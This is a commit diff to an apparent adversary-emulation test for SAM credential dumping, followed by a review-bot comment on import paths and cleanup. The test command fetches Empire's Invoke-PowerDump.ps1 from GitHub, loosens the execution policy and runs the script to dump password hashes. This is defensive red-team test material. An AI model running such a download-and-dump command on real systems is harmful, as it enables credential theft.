Update T1003.002.yaml (#1212)

Request raw Invoke-PowerDump.ps1 instead of repository page
kpsmiley23
2020-09-03 17:48:52 -04:00
committed by GitHub
parent 04a409832e
commit 730a62b977
+1 -1
@@ -88,7 +88,7 @@ atomic_tests:
command: |-
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Import-Module .\PowerDump.ps1
Invoke-PowerDump
name: powershell
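Review bot: `Import-Module .\PowerDump.ps1` loads from the current directory, while the download is written to `$Env:Temp\PowerDump.ps1`, so the test runs the pinned file only if the executor's working directory happens to be `$Env:Temp`. Otherwise it fails, or imports whatever same-named script is already in the working directory; import by the path that was written instead: `Import-Module "$Env:Temp\PowerDump.ps1"`. The `Write-Host` line also announces disabling Defender real-time monitoring, but no visible command does that, so the message should be corrected or the step documented. `Set-ExecutionPolicy -Scope CurrentUser` persists after the run, and the cleanup section is outside this hunk, so confirm that it restores the previous policy and deletes the downloaded script from `$Env:Temp`.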